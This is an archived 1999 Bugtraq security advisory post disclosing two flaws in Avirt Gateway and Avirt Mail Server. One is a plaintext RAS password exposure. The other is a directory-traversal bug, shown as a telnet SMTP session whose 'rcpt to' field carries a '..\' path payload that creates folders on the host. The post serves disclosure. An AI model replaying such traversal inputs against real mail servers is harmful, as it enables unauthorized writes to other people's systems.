----- Original Message ----- From: Luciano Martins <luckat_private> To: <BUGTRAQat_private> Sent: Monday, November 01, 1999 9:57 AM Subject: Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability > Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow > vulnerability I post another 2 bugs concerning Avirt Gateway and Avirt Mail Server 3.3 and 3.5 in BUGTRAQ-ES a month ago. I will try (excuse my poor English) to translate this message here. 1) Anybody with console access could retrieve RAS password in Avirt Gateway. Changing the username in "Internet connection" properties and pressing "test" button makes Avirt to present a message box with the password in plaintext. 2) Anybody on the Intranet could make directories anywhere in the NT running Avirt Mail Server. telnet 192.168.0.1 25 > 220 server aVirt Mail SMTP Server Ready. mail from:foo > 250 foo, Sender OK rcpt to:..\..\..\..\newfolder > 250 ..\..\..\..\newfolder, Receipient OK data > 354 Please enter mail, ending with a "." on a line by itself Textinside . > 250 Mail accepted. This will create a root folder named "newfolder" with a file inside it. Fortunately it appears to be impossible to overwrite an existing directory. Avirt has been notified about this security flaws on 23/8/99 Regards Jesús López de Aguileta EunateNet
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:09:30 PDT